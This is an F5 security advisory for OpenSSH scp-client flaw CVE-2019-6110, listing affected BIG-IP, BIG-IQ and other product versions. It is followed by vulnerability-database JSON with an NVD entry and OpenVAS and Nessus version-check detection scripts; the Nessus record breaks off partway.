ID F5:K42531048 Type f5 Reporter f5 Modified 2019-02-20T02:12:00
Description
F5 Product Development has assigned ID 757604 (BIG-IP), ID 757604-8 (BIG-IQ), ID 757604-9 (Enterprise Manager), ID 757604-10 (F5 iWorkflow), and CPF-25054 and CPF-25055 (Traffix) to this vulnerability. Additionally, BIG-IP iHealth may list Heuristic H42531048 on the Diagnostics > Identified > Low page.
To determine if your product and version have been evaluated for this vulnerability, refer to the Applies to (see versions) box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table. For more information about security advisory versioning, refer to K51812227: Understanding Security Advisory versioning.
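Product | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score¹ | Vulnerable component or feature
---|---|---|---|---|---|---
BIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, FPS, GTM, Link Controller, PEM, WebAccelerator) | 14.x | 14.0.0 - 14.1.0 | None | Low | 3.1 | OpenSSH (SCP client)
BIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, FPS, GTM, Link Controller, PEM, WebAccelerator) | 13.x | 13.0.0 - 13.1.1 | None | Low | 3.1 | OpenSSH (SCP client)
BIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, FPS, GTM, Link Controller, PEM, WebAccelerator) | 12.x | 12.1.0 - 12.1.4 | None | Low | 3.1 | OpenSSH (SCP client)
BIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, FPS, GTM, Link Controller, PEM, WebAccelerator) | 11.x | 11.5.1 - 11.6.3 | None | Low | 3.1 | OpenSSH (SCP client)
Enterprise Manager | 3.x | 3.1.1 | None | Low | 3.1 | OpenSSH (SCP client)
BIG-IQ Centralized Management | 6.x | 6.0.0 - 6.1.0 | None | Low | 3.1 | OpenSSH (SCP client)
BIG-IQ Centralized Management | 5.x | 5.0.0 - 5.4.0 | None | Low | 3.1 | OpenSSH (SCP client)
F5 iWorkflow | 2.x | 2.3.0 | None | Low | 3.1 | OpenSSH (SCP client)
Traffix SDC | 5.x | 5.0.0 - 5.1.0 | None | Low | 3.1 | OpenSSH (SCP client)
Traffix SDC | 4.x | 4.4.0 | None | Low | 3.1 | OpenSSH (SCP client)

¹ The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.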
If you are running a version listed in the Versions known to be vulnerable column, you can eliminate this vulnerability by upgrading to a version listed in the Fixes introduced in column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.
Mitigation
There is no mitigation for a man-in-the-middle (MITM) attack.
You can mitigate the vulnerability from a malicious server by verifying the host key fingerprint when connecting to systems with the SCP client.
{"id": "F5:K42531048", "bulletinFamily": "software", "title": "OpenSSH vulnerability CVE-2019-6110", "description": "\nF5 Product Development has assigned ID 757604 (BIG-IP), ID 757604-8 (BIG-IQ), ID 757604-9 (Enterprise Manager), ID 757604-10 (F5 iWorkflow), and CPF-25054 and CPF-25055 (Traffix) to this vulnerability. Additionally, [BIG-IP iHealth](<https://www.f5.com/services/support/support-offerings/big-ip-ihealth-diagnostic-tool>) may list Heuristic H42531048 on the **Diagnostics** > **Identified** > **Low** page.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table. For more information about security advisory versioning, refer to [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>).\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, FPS, GTM, Link Controller, PEM, WebAccelerator) | 14.x | 14.0.0 - 14.1.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N>) | OpenSSH (SCP client) \n13.x | 13.0.0 - 13.1.1 | None \n12.x | 12.1.0 - 12.1.4 | None \n11.x | 11.5.1 - 11.6.3 | None \nEnterprise Manager | 3.x | 3.1.1 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N>) | OpenSSH (SCP client) \nBIG-IQ Centralized Management | 6.x | 6.0.0 - 6.1.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N>) | OpenSSH (SCP client) \n5.x | 5.0.0 - 5.4.0 | None \nF5 iWorkflow | 2.x | 
2.3.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N>) | OpenSSH (SCP client) \nTraffix SDC | 5.x | 5.0.0 - 5.1.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N>) | OpenSSH (SCP client) \n4.x | 4.4.0 | None \n \n1The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Fixes introduced in** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nThere is no mitigation for a man-in-the-middle (MITM) attack.\n\nYou can mitigate the vulnerability from a malicious server by verifying the host key fingerprint when connecting to systems with the SCP client.\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K31781390: January 2019 OpenSSH security vulnerabilities](<https://support.f5.com/csp/article/K31781390>)\n", "published": "2019-01-18T00:07:00", "modified": "2019-02-20T02:12:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:N"}, "href": 
"https://support.f5.com/csp/article/K42531048", "reporter": "f5", "references": [], "cvelist": ["CVE-2019-6110"], "type": "f5", "lastseen": "2020-04-06T22:39:32", "edition": 1, "viewCount": 120, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-6110"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97", "EXPLOITPACK:98FE96309F9524B8C84C508837551A19"]}, {"type": "nessus", "idList": ["SUSE_SU-2019-0125-1.NASL", "OPENSUSE-2019-91.NASL", "OPENSUSE-2019-93.NASL", "SUSE_SU-2019-0126-1.NASL", "GENTOO_GLSA-201903-16.NASL", "SUSE_SU-2019-0132-1.NASL", "PHOTONOS_PHSA-2019-2_0-0165_OPENSSH.NASL", "NEWSTART_CGSL_NS-SA-2019-0060_OPENSSH.NASL", "SUSE_SU-2019-13931-1.NASL", "PHOTONOS_PHSA-2019-1_0-0237_OPENSSH.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-32009"]}, {"type": "exploitdb", "idList": ["EDB-ID:46516", "EDB-ID:46193"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:151227"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310852256", "OPENVAS:1361412562310852264", "OPENVAS:1361412562310814661"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:0093-1", "OPENSUSE-SU-2019:0091-1"]}, {"type": "thn", "idList": ["THN:445A5A09D3930F981A45FE5AFA1E4CEC"]}, {"type": "gentoo", "idList": ["GLSA-201903-16"]}, {"type": "f5", "idList": ["F5:K31781390"]}, {"type": "symantec", "idList": ["SMNTC-1756"]}, {"type": "aix", "idList": ["OPENSSH_ADVISORY13.ASC"]}], "modified": "2020-04-06T22:39:32", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2020-04-06T22:39:32", "rev": 2}, "vulnersScore": 7.1}, "affectedSoftware": []}
{"cve": [{"lastseen": "2021-02-02T07:13:03", "description": "In OpenSSH 7.9, due to accepting and displaying arbitrary stderr output from the server, a malicious server (or Man-in-The-Middle attacker) can manipulate the client output, for example to use ANSI control codes to hide additional files being transferred.", "edition": 7, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.2}, "published": "2019-01-31T18:29:00", "title": "CVE-2019-6110", "type": "cve", "cwe": ["CWE-838"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-6110"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/a:winscp:winscp:5.13", "cpe:/a:openbsd:openssh:7.9", "cpe:/a:netapp:ontap_select_deploy:-", "cpe:/a:netapp:storage_automation_store:-", "cpe:/a:netapp:element_software:-"], "id": "CVE-2019-6110", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-6110", "cvss": {"score": 4.0, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:netapp:element_software:-:*:*:*:*:*:*:*", "cpe:2.3:a:winscp:winscp:5.13:*:*:*:*:*:*:*", "cpe:2.3:a:openbsd:openssh:7.9:*:*:*:*:*:*:*", 
"cpe:2.3:a:netapp:ontap_select_deploy:-:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:storage_automation_store:-:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:32:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-6109", "CVE-2019-6110"], "description": "The host is installed with PuTTY and is\n prone to multiple spoofing vulnerabilities.", "modified": "2019-05-17T00:00:00", "published": "2019-01-17T00:00:00", "id": "OPENVAS:1361412562310814661", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814661", "type": "openvas", "title": "PuTTY SCP Multiple Spoofing Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# PuTTY SCP Multiple Spoofing Vulnerabilities (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2019 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:putty:putty\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814661\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2019-6109\", \"CVE-2019-6110\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-01-17 15:17:22 +0530 (Thu, 17 Jan 2019)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_name(\"PuTTY SCP Multiple Spoofing Vulnerabilities (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with PuTTY and is\n prone to multiple spoofing vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - A missing character encoding in the progress display, the object name\n can be used to manipulate the client output.\n\n - Accepting and displaying arbitrary stderr output from the scp server, a\n malicious server can manipulate the client output.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n servers to spoof the client output.\");\n\n script_tag(name:\"affected\", value:\"PuTTY version 0.70 and earlier on Windows.\");\n\n script_tag(name:\"solution\", value:\"Update to version 0.71 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", 
value:\"https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt\");\n script_xref(name:\"URL\", value:\"https://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/pscp-unsanitised-server-output.html\");\n\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_putty_portable_detect.nasl\");\n script_mandatory_keys(\"putty/version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nputVer = infos['version'];\npath = infos['location'];\n\nif(version_is_less(version:putVer, test_version:\"0.71\")) {\n report = report_fixed_ver(installed_version:putVer, fixed_version:\"0.71\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-01-31T16:53:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2019-01-30T00:00:00", "id": "OPENVAS:1361412562310852264", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852264", "type": "openvas", "title": "openSUSE: Security Advisory for openssh (openSUSE-SU-2019:0093-1)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it 
will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852264\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-20685\", \"CVE-2019-6109\", \"CVE-2019-6110\", \"CVE-2019-6111\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-01-30 04:04:25 +0100 (Wed, 30 Jan 2019)\");\n script_name(\"openSUSE: Security Advisory for openssh (openSUSE-SU-2019:0093-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:0093-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-01/msg00041.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssh'\n package(s) announced via the openSUSE-SU-2019:0093-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for openssh fixes the following issues:\n\n Security issue fixed:\n\n - CVE-2018-20685: Fixed an issue where scp client allows remote SSH\n 
servers to bypass intended access restrictions (bsc#1121571)\n\n - CVE-2019-6109: Fixed an issue where the scp client would allow malicious\n remote SSH servers to manipulate terminal output via the object name,\n e.g. by inserting ANSI escape sequences (bsc#1121816)\n\n - CVE-2019-6110: Fixed an issue where the scp client would allow malicious\n remote SSH servers to manipulate stderr output, e.g. by inserting ANSI\n escape sequences (bsc#1121818)\n\n - CVE-2019-6111: Fixed an issue where the scp client would allow malicious\n remote SSH servers to execute directory traversal attacks and overwrite\n files (bsc#1121821)\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2019-93=1\");\n\n script_tag(name:\"affected\", value:\"openssh on openSUSE Leap 42.3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~7.2p2~29.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-askpass-gnome\", rpm:\"openssh-askpass-gnome~7.2p2~29.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-askpass-gnome-debuginfo\", rpm:\"openssh-askpass-gnome-debuginfo~7.2p2~29.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"openssh-cavs\", rpm:\"openssh-cavs~7.2p2~29.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-cavs-debuginfo\", rpm:\"openssh-cavs-debuginfo~7.2p2~29.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-debuginfo\", rpm:\"openssh-debuginfo~7.2p2~29.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-debugsource\", rpm:\"openssh-debugsource~7.2p2~29.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-fips\", rpm:\"openssh-fips~7.2p2~29.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-helpers\", rpm:\"openssh-helpers~7.2p2~29.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-helpers-debuginfo\", rpm:\"openssh-helpers-debuginfo~7.2p2~29.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-01-31T16:47:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2019-01-29T00:00:00", "id": "OPENVAS:1361412562310852256", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852256", "type": "openvas", "title": "openSUSE: Security Advisory for openssh (openSUSE-SU-2019:0091-1)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it 
and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852256\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-20685\", \"CVE-2019-6109\", \"CVE-2019-6110\", \"CVE-2019-6111\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-01-29 04:02:12 +0100 (Tue, 29 Jan 2019)\");\n script_name(\"openSUSE: Security Advisory for openssh (openSUSE-SU-2019:0091-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:0091-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-01/msg00036.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssh'\n package(s) announced via the openSUSE-SU-2019:0091-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable 
package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for openssh fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2018-20685: Fixed an issue where scp client allows remote SSH\n servers to bypass intended access restrictions (bsc#1121571)\n\n - CVE-2019-6109: Fixed an issue where the scp client would allow malicious\n remote SSH servers to manipulate terminal output via the object name,\n e.g. by inserting ANSI escape sequences (bsc#1121816)\n\n - CVE-2019-6110: Fixed an issue where the scp client would allow malicious\n remote SSH servers to manipulate stderr output, e.g. by inserting ANSI\n escape sequences (bsc#1121818)\n\n - CVE-2019-6111: Fixed an issue where the scp client would allow malicious\n remote SSH servers to execute directory traversal attacks and overwrite\n files (bsc#1121821)\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2019-91=1\");\n\n script_tag(name:\"affected\", value:\"openssh on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n if(!isnull(res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~7.6p1~lp150.8.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-cavs\", rpm:\"openssh-cavs~7.6p1~lp150.8.9.1\", rls:\"openSUSELeap15.0\"))) {\n 
report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-cavs-debuginfo\", rpm:\"openssh-cavs-debuginfo~7.6p1~lp150.8.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-debuginfo\", rpm:\"openssh-debuginfo~7.6p1~lp150.8.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-debugsource\", rpm:\"openssh-debugsource~7.6p1~lp150.8.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-fips\", rpm:\"openssh-fips~7.6p1~lp150.8.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-helpers\", rpm:\"openssh-helpers~7.6p1~lp150.8.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-helpers-debuginfo\", rpm:\"openssh-helpers-debuginfo~7.6p1~lp150.8.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-askpass-gnome\", rpm:\"openssh-askpass-gnome~7.6p1~lp150.8.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-askpass-gnome-debuginfo\", rpm:\"openssh-askpass-gnome-debuginfo~7.6p1~lp150.8.9.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "nessus": [{"lastseen": "2021-02-01T01:09:51", "description": "An update of the openssh package has been released.", "edition": 17, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-06-24T00:00:00", "title": "Photon OS 2.0: Openssh PHSA-2019-2.0-0165", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-13259", "CVE-2019-6110"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:openssh", 
"cpe:/o:vmware:photonos:2.0"], "id": "PHOTONOS_PHSA-2019-2_0-0165_OPENSSH.NASL", "href": "https://www.tenable.com/plugins/nessus/126107", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2019-2.0-0165. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(126107);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/06/26 10:34:07\");\n\n script_cve_id(\"CVE-2019-6110\");\n script_bugtraq_id(106836);\n\n script_name(english:\"Photon OS 2.0: Openssh PHSA-2019-2.0-0165\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the openssh package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-165.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-13259\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/24\");\n\n 
